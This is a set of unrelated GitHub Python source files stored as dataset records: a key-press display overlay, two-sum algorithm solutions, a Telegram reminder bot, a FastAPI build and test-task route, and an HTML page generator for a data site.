{background:\" + \"#\" + str(zi_dark[0]) + \"; color: \" + \"#\" + str(zi_dark[1]) + \"}\")\ncolorscheme_pressed = str(\"* {background:\" + \"#\" + str(zi_darkP[0]) + \"; color: \" + \"#\" + str(zi_darkP[1]) + \"}\")\n\nclass Ui_Form(object):\n def setupUi(self, Form):\n Form.setObjectName(\"Form\")\n Form.resize(132, 132)\n Form.setStyleSheet(u\"* {background: #44BD32}\")\n font = QFont()\n font.setFamily(u\"Google Sans\")\n font.setBold(True)\n font.setWeight(75)\n self.lab_up = QLabel(Form)\n self.lab_up.setFont(font)\n self.lab_up.setGeometry(QRect(50, 15, 31, 31))\n self.lab_up.setStyleSheet(colorscheme)\n self.lab_up.setAlignment(Qt.AlignCenter)\n self.lab_up.setObjectName(\"lab_up\")\n self.lab_left = QLabel(Form)\n self.lab_left.setFont(font)\n self.lab_left.setGeometry(QRect(15, 50, 31, 31))\n self.lab_left.setStyleSheet(colorscheme)\n self.lab_left.setAlignment(Qt.AlignCenter)\n self.lab_left.setObjectName(\"lab_left\")\n self.lab_down = QLabel(Form)\n self.lab_down.setFont(font)\n self.lab_down.setGeometry(QRect(50, 50, 31, 31))\n self.lab_down.setStyleSheet(colorscheme)\n self.lab_down.setAlignment(Qt.AlignCenter)\n self.lab_down.setObjectName(\"lab_down\")\n self.lab_right = QLabel(Form)\n self.lab_right.setFont(font)\n self.lab_right.setGeometry(QRect(85, 50, 31, 31))\n self.lab_right.setStyleSheet(colorscheme)\n self.lab_right.setAlignment(Qt.AlignCenter)\n self.lab_right.setObjectName(\"lab_right\")\n self.lab_x = QLabel(Form)\n self.lab_x.setFont(font)\n self.lab_x.setObjectName(u\"lab_x\")\n self.lab_x.setGeometry(QRect(15, 85, 66, 31))\n self.lab_x.setStyleSheet(colorscheme)\n self.lab_x.setAlignment(Qt.AlignCenter)\n self.lab_c = QLabel(Form)\n self.lab_c.setFont(font)\n self.lab_c.setObjectName(u\"lab_c\")\n self.lab_c.setGeometry(QRect(85, 85, 31, 31))\n self.lab_c.setStyleSheet(colorscheme)\n self.lab_c.setAlignment(Qt.AlignCenter)\n\n self.retranslateUi(Form)\n QMetaObject.connectSlotsByName(Form)\n\n def retranslateUi(self, Form):\n _translate = QCoreApplication.translate\n Form.setWindowTitle(_translate(\"KeyStroke\", \"KeyStroke\"))\n self.lab_up.setText(_translate(\"Form\", \"↑\"))\n self.lab_left.setText(_translate(\"Form\", \"A\"))\n self.lab_down.setText(_translate(\"Form\", \"↓\"))\n self.lab_right.setText(_translate(\"Form\", \"D\"))\n self.lab_x.setText(_translate(\"Form\", \"X\"))\n self.lab_c.setText(_translate(\"Form\", \"C\"))\n\ndef release_up(f): \n ui.lab_up.setStyleSheet(str(colorscheme))\ndef pressed_up(f):\n ui.lab_up.setStyleSheet(str(colorscheme_pressed))\ndef release_down(f): \n ui.lab_down.setStyleSheet(str(colorscheme))\ndef pressed_down(f):\n ui.lab_down.setStyleSheet(str(colorscheme_pressed))\ndef release_a(f): \n ui.lab_left.setStyleSheet(str(colorscheme))\ndef pressed_a(f):\n ui.lab_left.setStyleSheet(str(colorscheme_pressed))\ndef release_d(f): \n ui.lab_right.setStyleSheet(str(colorscheme))\ndef pressed_d(f):\n ui.lab_right.setStyleSheet(str(colorscheme_pressed))\ndef release_x(f): \n ui.lab_x.setStyleSheet(str(colorscheme))\ndef pressed_x(f):\n ui.lab_x.setStyleSheet(str(colorscheme_pressed))\ndef release_c(f): \n ui.lab_c.setStyleSheet(str(colorscheme))\ndef pressed_c(f):\n ui.lab_c.setStyleSheet(str(colorscheme_pressed))\n\n# ---- Init\napp = QApplication(sys.argv)\nwindow = QWidget()\nui = Ui_Form()\nui.setupUi(window)\n\n# ---- Hotkeys\n# keyboard.add_hotkey('a', set_style_bgwhite) ---- This is a test\nkeyboard.on_press_key('up',pressed_up)\nkeyboard.on_release_key('up',release_up)\nkeyboard.on_press_key('down',pressed_down)\nkeyboard.on_release_key('down',release_down)\nkeyboard.on_press_key('a',pressed_a)\nkeyboard.on_release_key('a',release_a)\nkeyboard.on_press_key('d',pressed_d)\nkeyboard.on_release_key('d',release_d)\nkeyboard.on_press_key('c',pressed_c)\nkeyboard.on_release_key('c',release_c)\nkeyboard.on_press_key('x',pressed_x)\nkeyboard.on_release_key('x',release_x)\n\n# ---- Launch Window\nwindow.show()\nsys.exit(app.exec_())\n","repo_name":"null2264/Simple-KeyStroke","sub_path":"keystroke.py","file_name":"keystroke.py","file_ext":"py","file_size_in_byte":4600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17748714930","text":"def twoNumberSum_1(array, targetSum):\n # Time=O(0^2n) as two loops\n # Space=O(1)\n for i in range(len(array) - 1): # all way before last\n first_num = array[i]\n for j in range(i + 1, len(array)): # all to the end\n if first_num + array[j] == targetSum:\n return [first_num, array[j]]\n return []\n\ndef twoNumberSum_2(array, targetSum):\n # Time=O(n) traversing only once\n # Space=O(n) because adding\n # better solution but takes space\n # check if number needed is stored in hash table\n numbers_hash = {} # will store already checked values\n for number in array:\n possibleMatch = targetSum - number\n if possibleMatch in numbers_hash:\n return [possibleMatch, number]\n else: # move one side only, checking what went through\n numbers_hash[number] = \"checked\"\n return []\n\ndef twoNumberSum_3(array, targetSum):\n # Good sorint algorithm is O(nlog(n))\n # Time is sorting algorithm plus iteration tjhe most one\n # Space=O(1)\n # Sort array and use the fact that sum if passed.\n # than will exceed target\n array.sort()\n left_idx = 0\n right_idx = len(array) - 1\n while left_idx < right_idx:\n currentSum = array[left_idx] + array[right_idx]\n if currentSum == targetSum:\n return [array[left_idx], array[right_idx]]\n elif currentSum < targetSum:\n # we move left index because we know that\n # if we move right index the sum will be even less\n left_idx += 1\n elif currentSum > targetSum:\n # we move the right index bacuse we know that \n # the number on the left will be smaller\n # hence the overall sum will be smaller\n right_idx -= 1\n return []\n\ndef test_case():\n func = twoNumberSum_2\n output = func([3, 5, -4, 8, 11, 1, -1, 6], 10)\n assert len(output) == 2\n assert 11 in output\n assert -1 in output\n print(\"test1 passed\")\n output = func([3, 5, -4, 8, 6, 1, -1, 11], 10)\n assert len(output) == 2\n assert 11 in output\n assert -1 in output\n print(\"test2 passed\")\n\nif __name__ == '__main__':\n test_case()\n","repo_name":"tszyrowski/tries-python","sub_path":"alex/twoNumberSum.py","file_name":"twoNumberSum.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43855183759","text":"\"\"\" Simple notify-by-schedule telegram bot\n\n- coding: utf-8 -\n\nEmail: yuva.phalle0@gmail.com\nWebsite: github.com/yuvaphalle\n\n\"\"\"\n\nimport time\nimport schedule\nimport datetime\nimport random\nimport os\nimport threading\nfrom datetime import timedelta\n\nimport telebot\nfrom telebot import apihelper\n\nimport botmessages as bmsg\n\nprint('I\\'m alive!')\ntoken = os.environ['TOKEN']\nchat_id = os.environ['CHAT_ID']\nprint('Env vars reading successful')\n\nfixed_date = datetime.datetime(2019, 4, 10)\nbot = telebot.TeleBot(token)\n\nclass CleaningReminder:\n def __init__(self, token, chat_id, start_date):\n self.bot = telebot.TeleBot(token)\n \n self.chat_id = chat_id\n self.start_date = start_date\n\n self.room_list_1 = ['Mohit', 'Khurshid' ,'Yuva']\n self.room_list_2 = ['Khurshid', 'Yuva' ,'Mohit']\n \n self.pinned_message_id = None\n\n def add_remind_time(self, remind_time):\n schedule.every().day.at(remind_time).do(self.__clean_reminder)\n\n def polling(self):\n thread = threading.Thread(target=self.__polling_loop)\n thread.start()\n\n def __clean_reminder(self):\n message = bmsg.clean_headers[random.randint(0, len(bmsg.clean_headers) - 1)]\n \n day_date = datetime.datetime.today()\n for i in range(7):\n room_first = self.room_list_1[(day_date - self.start_date).days % len(self.room_list_1)]\n room_second = self.room_list_2[(day_date - self.start_date).days % len(self.room_list_2)]\n message += bmsg.clean_body.format(day_date.strftime(\"%A\"), room_first, room_second)\n day_date += timedelta(days=1)\n \n message += bmsg.clean_hashtag\n \n message_info = self.bot.send_message(chat_id, message)\n \n if self.pinned_message_id is not None:\n self.bot.unpin_chat_message(chat_id, self.pinned_message_id)\n\n self.bot.pin_chat_message(chat_id, message_info.message_id)\n self.pinned_message_id = message_info.message_id\n\n\n def __polling_loop(self): \n while True:\n schedule.run_pending()\n time.sleep(1)\n \n\n@bot.message_handler(commands=['start'])\ndef handle_start(message):\n bot.reply_to(message, bmsg.start + bmsg.hlp) \n\n\n@bot.message_handler(commands=['help'])\ndef handle_help(message):\n bot.reply_to(message, bmsg.hlp)\n\n\n@bot.message_handler(commands=['links'])\ndef handle_links(message):\n bot.reply_to(message, bmsg.links)\n\n\n\n@bot.message_handler(commands=['faq_en'])\ndef handle_faq_en(message):\n bot.reply_to(message, bmsg.faq_en)\n\n\n@bot.message_handler(content_types=[\"new_chat_members\"])\ndef handle_joinchat(message):\n bot.reply_to(message, bmsg.hlp)\n\nif __name__ == '__main__':\n reminder = CleaningReminder(token, chat_id, fixed_date)\n reminder.add_remind_time('10:00')\n reminder.polling()\n\n bot.polling()\n\n","repo_name":"yuvaphalle/SITAPTBOT","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18196540663","text":"\"\"\"\n@File : business_auto_deliver_test.py\n@Date : 2021/11/24 9:15\n@Author: 九层风(YePing Zhang)\n@Contact : yeahcheung213@163.com\n\"\"\"\nfrom fastapi import APIRouter\nfrom app.schemas import test_deliver_schemas, build_schemas, test_task_schemas\nfrom app.utils import response_code, html2string\nfrom app.models.build_model import *\nfrom app.db.database import *\nfrom app.models.test_task_model import *\nfrom app.models.action_model import *\nfrom app.config import ROOT_DIRECTORY, APPLY_TEST\nimport os\n\n# TEST_TASK_TEMPLATE_PATH = r'D:\\Python\\Project\\pythonProject\\TomTawCI\\app\\static\\testTaskDesc.html'\nTEST_TASK_TEMPLATE_PATH = os.path.join(ROOT_DIRECTORY, 'static', APPLY_TEST['TEMPLATE'])\n\nrouter = APIRouter(prefix=\"/ewordci/auto-deliver-test\", tags=[\"business\"])\n\n\n# 处理deliver入参\n\n\ndef para_deliver2build_schema(parameter: test_deliver_schemas.Deliver):\n\t\"\"\"\n\t将入参解析处理成build的参数\n\t根据是否有传老版本id,来返回带有id的更新参数或���不带id的新增参数\n\t:param parameter:\n\t:return:build_schema\n\t\"\"\"\n\tbuild_schema = build_schemas.Build(name=parameter.new_build_name,\n\t\t\t\t\t\t\t\t\t product=parameter.product_id,\n\t\t\t\t\t\t\t\t\t project=parameter.project_id,\n\t\t\t\t\t\t\t\t\t filePath=parameter.filePath,\n\t\t\t\t\t\t\t\t\t scmPath=parameter.scmPath,\n\t\t\t\t\t\t\t\t\t builder=parameter.builder,\n\t\t\t\t\t\t\t\t\t desc=parameter.desc,\n\t\t\t\t\t\t\t\t\t date=date.today())\n\tif parameter.old_build_id: # 有旧版本id则为更新操作,需要将id加进去\n\t\tbuild_schema.id = parameter.old_build_id\n\treturn build_schema\n\n\ndef para_deliver2task(parameter: test_deliver_schemas.Deliver):\n\t\"\"\"\n\t:param parameter:\n\t:return: 创建测试单需要的dict数据\n\t\"\"\"\n\t# 通过版本信息获取版本id,为了与测试单相关联\n\tquery_condition = dict(product=parameter.product_id, project=parameter.project_id, name=parameter.new_build_name)\n\t# print(query_condition)\n\tbuild_list = query_build_multiple_condition(query_condition)\n\tbuild_id = build_list[0].id\n\t# 获取测试单参数\n\ttask_name = \"{}{}{} 测试申请\".format(parameter.project_name, parameter.new_build_name,\n\t\t\t\t\t\t\t\t\t parameter.test_type)\n\ttest_desc_dict = dict(ifSmoke=parameter.if_smoke,\n\t\t\t\t\t\t manTime=parameter.man_time,\n\t\t\t\t\t\t testType=parameter.test_type,\n\t\t\t\t\t\t testSuggest=parameter.test_suggest,\n\t\t\t\t\t\t buildDesc=parameter.desc)\n\ttask_desc = html2string.task_html2string(TEST_TASK_TEMPLATE_PATH, test_desc_dict)\n\ttest_task_dict = dict(name=task_name, product=parameter.product_id, project=parameter.project_id, build=build_id,\n\t\t\t\t\t\t owner=parameter.owner, pri=parameter.pri, mailto=parameter.mailto, desc=task_desc,\n\t\t\t\t\t\t begin=parameter.begin,\n\t\t\t\t\t\t end=parameter.end)\n\treturn test_task_dict\n\n\n@router.post(\"/create\", name=\"自动创建版本、创建测试单\")\nasync def generate_deliver_task(deliver_info: test_deliver_schemas.Deliver):\n\t# 新建、修改版本处理\n\tif deliver_info.old_build_id: # 通过是入参中是否传老版本id判断是修改还是新增\n\t\t# 获取入参的版本信息\n\t\tupdate_build_schema = para_deliver2build_schema(deliver_info)\n\t\tupdate_build_schema.name = deliver_info.new_build_name\n\t\tupdate_build_schema.desc = deliver_info.desc\n\t\tupdate_build_schema.scmPath = deliver_info.scmPath\n\t\tupdate_build_schema.filePath = deliver_info.filePath\n\t\tupdate(update_build_schema, BuildModel)\n\t\t# 插入操作日志\n\t\tdb_action = ActionModel(\n\t\t\tget_action_dict('build', deliver_info.old_build_id, deliver_info.product_id, deliver_info.project_id,\n\t\t\t\t\t\t\tdeliver_info.builder, 'edited'))\n\t\tcreate(db_action)\n\t\tbuild_handle_flag = True\n\t\tbuild_handle_message = \"版本修改成功\"\n\telse:\n\t\t# 判断新增的数据版本号是否重复\n\t\tcondition = dict(name=deliver_info.new_build_name, product=deliver_info.product_id,\n\t\t\t\t\t\t project=deliver_info.project_id) # 版本查询条件\n\t\tif query_build_multiple_condition(condition):\n\t\t\tbuild_handle_flag = False\n\t\t\tbuild_handle_message = \"已存在同的版本\"\n\t\telse:\n\t\t\tcreate_build_schema = para_deliver2build_schema(deliver_info)\n\t\t\tdb_build = BuildModel(create_build_schema.dict())\n\t\t\tcreate(db_build)\n\t\t\t# 插入操作日志\n\t\t\tdb_action = ActionModel(\n\t\t\t\tget_action_dict('build', db_build.id, deliver_info.product_id, deliver_info.project_id,\n\t\t\t\t\t\t\t\tdeliver_info.builder, 'opened'))\n\t\t\tcreate(db_action)\n\t\t\tbuild_handle_flag = True\n\t\t\tbuild_handle_message = \"版本创建成功\"\n\ttask_handle_flag = False\n\ttask_handle_message = ''\n\tsuccess_task_id = 0 # 用于存放创建成功的测试单id\n\tif build_handle_flag: # 判断版本是否创建成功\n\t\ttask_dict = para_deliver2task(deliver_info)\n\t\t# 判断此版本号的测试单是否存在,若存在则修改,不存在则创建\n\t\t# 根据版本号查询测试单\n\t\tupdate_test_task = query_testtask(dict(build=task_dict['build']))\n\t\tif update_test_task:\n\t\t\tupdate_task_schema = test_task_schemas.TestTask(**task_dict)\n\t\t\tupdate_task_schema.id = update_test_task.id\n\t\t\tupdate(update_task_schema, TestTaskModel)\n\t\t\t# 插入操作日志\n\t\t\tdb_action = ActionModel(\n\t\t\t\tget_action_dict('testtask', update_task_schema.id, deliver_info.product_id, deliver_info.project_id,\n\t\t\t\t\t\t\t\tdeliver_info.builder, 'edited'))\n\t\t\tcreate(db_action)\n\t\t\ttask_handle_message = \"测试单修改成功\"\n\t\t\tsuccess_task_id = update_test_task.id\n\t\telse:\n\t\t\tdb_test_task = TestTaskModel(task_dict)\n\t\t\tcreate(db_test_task)\n\t\t\t# 插入操作日志\n\t\t\tdb_action = ActionModel(\n\t\t\t\tget_action_dict('testtask', db_test_task.id,deliver_info.product_id, deliver_info.project_id,\n\t\t\t\t\t\t\t\tdeliver_info.builder, 'opened'))\n\t\t\tcreate(db_action)\n\t\t\ttask_handle_message = \"测试单创建成功\"\n\t\t\tsuccess_task_id = db_test_task.id\n\t\ttask_handle_flag = True\n\tif build_handle_flag and task_handle_flag:\n\t\treturn response_code.resp_200(success_task_id,\n\t\t\t\t\t\t\t\t\t message='{}且{}'.format(build_handle_message, task_handle_message))\n\telse:\n\t\treturn response_code.resp_204(message=build_handle_message)\n\n\nif __name__ == \"__main__\":\n\tpass\n","repo_name":"cappuccino213/TomTawCI","sub_path":"app/routers/business_auto_deliver_test.py","file_name":"business_auto_deliver_test.py","file_ext":"py","file_size_in_byte":5946,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"17471542526","text":"import glob\nimport os\nimport subprocess\nimport re\n\n#\n# Reletive Paths.\n#\n\nDATA_ROOT = \"../data/\"\nWEB_DATA_ROOT = \"/data/\"\nPACK_LOCATION = \"packs/\"\nDATA_TYPES = [\"election\", \"matching\", \"combinatorial\", \"optimization\"]\nDATA_NAMES = [\"Election Data\", \"Matching Data\", \"Rating and Combinatorial Preference Data\", \"Optimization Data\"]\nLINK_NAMES = ['''''', '''''', '''''', '''''']\n\nEXTENSIONS = [\"soc\", \"soi\", \"toc\", \"toi\", \"tog\", \"mjg\", \"wmg\", \"pwg\", \"wmd\"]\n\n\nEXTENSION_LONG = { \"soc\":\"Strict Order - Complete List\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"soi\":\"Strict Order - Incomplete List\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"toc\":\"Order with Ties - Complete List\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"toi\":\"Order with Ties - Incomplete List\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"tog\":\"Tournament Graph\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"mjg\":\"Majority Graph\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"wmg\":\"Weighted Majority Graph\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"pwg\":\"Pairwise Graph\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"wmd\":\"Weighted Matching Data\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"zip\":\"Zipped Data File\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"dat\":\"Extra Data File (CSV)\"}\n\nFORMAT_LINKS = { \"soc\":\"/data/format.php#soc\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"soi\":\"/data/format.php#soi\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"toc\":\"/data/format.php#toc\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"toi\":\"/data/format.php#toi\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"tog\":\"/data/format.php#tog\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"mjg\":\"/data/format.php#mjg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"wmg\":\"/data/format.php#wmg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"pwg\":\"/data/format.php#pwg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"wmd\":\"/data/format.php#wmd\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"zip\":\"/data/format.php#data\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"dat\":\"/data/format.php#data\"}\n\n\n\n\n#\n# Page Pieces.\n#\n\nHEAD_AND_MENU = \\\n\t'''\n\t\n\t\n\t\n\t\t\n\t\n\n\t\n\t\t
\n\t\t\t\n\t'''\n\nDATA_INDEX_INTRO = \\\n\t'''\n\t\t\t
\n\t\t\t\t
Data Sets
\n\t\t\t\t

Our data is separated into four categories:\n\t\t\t\t

    \n\t\t\t\t\t
  • Election Data (ED): Contains data that either was an election, or can be interpreted as election data. We have data from actual elections, movie rankings, and competitor rankings from various sporting competitions.
  • \n\t\t\t\t\t
  • Matching Data (MD): Contains data where agents express preference over items (and vise-verse) in order to pair agents to items. Currently, we only have synthetic data from organ and kidney matching in the USA.
  • \n\t\t\t\t\t
  • Rating and Combinatorial Preference Data (CD): Contains data from a broad set of domains that can be viewed as combinatorial and/or multidimensional including multi-attribute ratings, CP-nets, and GAI-nets.
  • \n\t\t\t\t\t
  • Optimization Data (OD): Contain data that is typically associated with optimization problems including SAT and CSP problems.
  • \n\t\t\t\t

    \n\n\t\t\t\t

    Each data file we host has a unique identifier in the format [XX]-#####-########.EXT. These numbers are broken down as:\n\t\t\t\t

      \n\t\t\t\t\t
    • XX is a 2 letter category code from above.
    • \n\t\t\t\t\t
    • ##### is a 5 digit Series Code which specifies the source of the data.
    • \n\t\t\t\t\t
    • ######## is an 8 digit Element Number for each individual file of a series.\n\t\t\t\t\t
    • EXT which is a unique file extension describing the type of data in the file.\n\t\t\t\t
    \n\t\t\t\t

    \n\n\t\t\t\t

    Each data file is labeled as either Original, Induced, or Imbued.\n\t\t\t\t

      \n\t\t\t\t\t
    • Original: Data that has only been converted into our formatting.
    • \n\t\t\t\t\t
    • Induced: Data that has been induced from another context. For example, computing a pairwise relation form a set of strict total orders. No assumptions have been made to create these files, just a change in the expression language.
    • \n\t\t\t\t\t
    • Imbued: Data that has been imbued with extra information. For example, extending an incomplete partial order by placing all unranked candidates tied at the end.
    • \n\t\t\t\t
    \n\t\t\t\tWe encourage you to understand some of the impacts that making these assumptions can have, see, e.g. A Behavioral Perspective on Social Choice. Anna Popova, Michel Regenwetter, and Nicholas Mattei. Annals of Mathematics and Artificial Intelligence 68(1-3), 2013.\n\t\t\t\t

    \n\t\t\t
\n\t'''\n\nPICTURES_AND_LINKS = \\\n\t'''\n\t\t\t\n\t\t\t
\n\t\t\t\t

\n\t\t\t\t\"\"\n\n\t\t\t\t

Supported By:

\"\"\n\t\t\t\t

\n\t\t\t
\n\n\t\t\t\n\t\t\t
\n\t\t\t
\n\t\t\t
\n\t'''\n\n### Can only be used with a 8 width grid!!!\nLINKS = \\\n\t'''\n\t\t\t\n\t\t\t
\n\t\t\t\t
Links
\n\t\t\t\t\n\t\t\t
\n\t'''\n\nBREAK_AND_FOOTER = \\\n\t'''\n\t\t\t\n\t\t\t\n\t\t
\n\t\n\t\n\t'''\n\ndef make_study_html(studies):\n\t\t'''\n\t\tConvert a record in the following format:\n\t\tBudgeted Social Choice: From Consensus to Personalized Decision Making; Tyler Lu and Craig Boutilier; IJCAI 2011; | Record 2 | Record 3\n\n\t\tinto a html UL list with links to google scholar for\n\t\tthe title of the paper.\n\n\t\tParameters\n\t\t-----------\n\t\tstudies: string\n\t\t\t\tA string in the above format which details the studie\n\t\t\t\tused with a dataset. The individual records are deliminted\n\t\t\t\twith a | while the components of a record are delimited with ;\n\t\t\t\tIf there are no ;'s then it means we return the NONE indicator.\n\n\t\tReturns\n\t\t-----------\n\t\t\t\tFormatted HTML string of